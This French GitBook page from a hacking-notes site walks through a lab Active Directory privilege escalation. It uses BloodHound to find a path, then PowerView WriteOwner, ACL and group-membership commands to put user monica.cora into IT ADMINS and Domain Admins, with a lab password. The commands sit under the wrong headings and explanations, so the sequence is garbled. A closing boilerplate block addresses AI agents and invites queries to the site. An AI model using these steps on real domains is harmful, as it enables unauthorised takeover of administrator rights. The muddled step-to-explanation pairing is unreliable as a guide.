> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md).

# Analyse avec BloodHound

Après avoir généré les objets vulnérables, vous pouvez relancer une collecte SharpHound :

{% code overflow="wrap" %}

```powershell
 . ./SharpHound.exe
```

{% endcode %}

<figure><img src="/files/cd30de559e8c0ddeb265790fa137395a2f84ac29" alt=""><figcaption></figcaption></figure>

SharpHound génère un `.zip` .

Lancez ensuite BloodHound :

{% code overflow="wrap" %}

```powershell
bloodhound --no-sandbox &
```

{% endcode %}

Puis nous importons le `.zip` fichier dans BloodHound.

Après l’importation, nous pouvons voir :

* de nouveaux utilisateurs ;
* de nouveaux groupes ;
* les nouvelles ACL ;
* les chemins de privilège ;
* des relations entre objets.

<figure><img src="/files/a413e12542e021ae8353589420290ebe9c1c315e" alt=""><figcaption></figcaption></figure>

### Trouver un chemin vers Domain Admin

<figure><img src="/files/dc5908cc6c80f83127c629f3dee0ab189c922841" alt=""><figcaption></figcaption></figure>

Dans BloodHound, nous utilisons l’analyse :

{% code overflow="wrap" %}

```bash
Trouver les chemins les plus courts vers les Domain Admins
```

{% endcode %}

<figure><img src="/files/c001369e82231d38f6de1043b0f37bc9dc7b144c" alt=""><figcaption></figcaption></figure>

Cette requête trouve les chemins les plus courts vers le groupe des administrateurs du domaine.

Dans le laboratoire, BloodHound affiche par exemple un groupe :

```bash
IT ADMINS
```

<figure><img src="/files/4b3a994413637d714ad29e4d8e0a8d014d45ce51" alt=""><figcaption></figcaption></figure>

Ce groupe contient plusieurs utilisateurs, tels que :

```bash
Deidre Corry
Lisette.pru
Gypsy.nelle
```

<figure><img src="/files/e225d7ecc0c2d2f430bf0ad6a2a18c2b0563bc8a" alt=""><figcaption></figcaption></figure>

Nous pouvons ensuite analyser les relations entre groupes, par exemple :

```wasm
Project Management -> IT ADMINS -> Domain Admins
```

L’objectif est de comprendre comment une mauvaise configuration des permissions peut mener à un groupe privilégié.

<figure><img src="/files/b3f66e5c6bdace6c34b2fceb0fa68ef384d94a4c" alt=""><figcaption></figcaption></figure>

### Exploitation d’une mauvaise configuration des ACL

> Cette étape n’est réalisée que dans un laboratoire autorisé.

Dans ce scénario, l’utilisateur `monica.cora` dispose d’un chemin exploitable vers le groupe :

```
IT ADMINS
```

Nous utiliserons nos droits pour prendre le contrôle de ce groupe, puis progresser vers un groupe plus privilégié.

<figure><img src="/files/ef996738d3398ca72817e047ee874172c6f6c974" alt=""><figcaption></figcaption></figure>

### Connexion avec l’utilisateur monica.cora

<figure><img src="/files/48062cf82ac3f4e13312d01add0b7d1f4e5b5552" alt=""><figcaption></figcaption></figure>

Nous nous connectons avec l’utilisateur :

{% code overflow="wrap" %}

```
monica.cora
```

{% endcode %}

Mot de passe utilisé dans le laboratoire :

```
Password123$
```

Nous ouvrons une session PowerShell avec cet utilisateur :

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">runas /user:whoami/monica.cora /netonly powershell

<strong>. C:/Users/user1/Desktop/PowerView.ps1
</strong></code></pre>

Explication :

* `runas` lance un programme avec un autre utilisateur ;
* `/netonly` utilise ces identifiants uniquement pour l’accès réseau ;
* `powershell` ouvre une nouvelle session PowerShell.

### Chargement de PowerView

Dans la nouvelle session PowerShell :

{% code overflow="wrap" %}

```bash
Set-DomainObjectOwner -Identity "IT ADMINS" -OwnerIdentity monica.cora
```

{% endcode %}

Cela charge PowerView dans `monica.cora`la session de .

<figure><img src="/files/7b39eeb3b9706ce017c7e5b6a8618d489c2a5046" alt=""><figcaption></figcaption></figure>

### Exploitation du droit WriteOwner

Le **WriteOwner** le droit permet de modifier le propriétaire d’un objet Active Directory.

Dans ce scénario, `monica.cora` devient le propriétaire du groupe :

```
IT ADMINS
```

<figure><img src="/files/8c0baa394391ac757ad8e8e1f72222071ed21850" alt=""><figcaption></figcaption></figure>

Ordre :

{% code overflow="wrap" %}

```powershell
Add-DomainObjectAcl -TargetIdentity "IT ADMINS" -Rights WriteMembers -PrincipalIdentity monica.cora
```

{% endcode %}

Après cette étape, le propriétaire de l’objet devient :

```
WHOAMI/monica.cora
```

<figure><img src="/files/25dbc045387f487c70d8670a589b43b327fe9031" alt=""><figcaption></figcaption></figure>

### Droit WriteMembers ajouté

Être propriétaire d’un objet permet généralement de modifier sa DACL.

Nous ajoutons donc à `monica.cora` le droit de modifier les membres du `IT ADMINS` groupe.

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'IT ADMINS' -Members 'monica.cora'
```

{% endcode %}

Ce droit permet `monica.cora` d’ajouter des membres au `IT ADMINS` groupe.

<figure><img src="/files/9fd023279cb5ae246253ef097b7221a55f54b51e" alt=""><figcaption></figcaption></figure>

### monica.cora a été ajouté au groupe IT ADMINS

Nous ajoutons maintenant `monica.cora` au groupe :

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'monica.cora'
```

{% endcode %}

Pour vérifier :

```wasm
Get-DomainGroupMember -Identity "IT ADMINS" | select MemberName
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
